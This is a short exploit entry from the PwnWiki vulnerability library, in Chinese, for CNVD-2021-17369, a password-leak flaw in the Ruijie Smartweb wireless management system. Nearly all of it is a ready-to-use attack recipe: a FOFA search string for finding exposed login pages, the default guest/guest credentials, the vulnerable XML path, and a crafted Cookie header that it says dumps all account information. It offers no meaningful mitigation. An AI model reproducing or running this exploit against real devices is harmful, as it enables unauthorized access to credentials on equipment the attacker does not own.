◆◆0

CNVD-2021-17369 锐捷Smartweb管理系统密码信息泄露漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

FOFA

title="无线smartWeb--登录页面"

默认guest密码

guest/guest

漏洞位置

http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml

漏洞利用

Cookie添加以下内容

Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

可以获取所有账户信息

参考

https://mp.weixin.qq.com/s/EICYTqRWDRB8OfXKHxCBfQ

免费、自由、人人可编辑的漏洞库--pwnwiki.com

返回顶部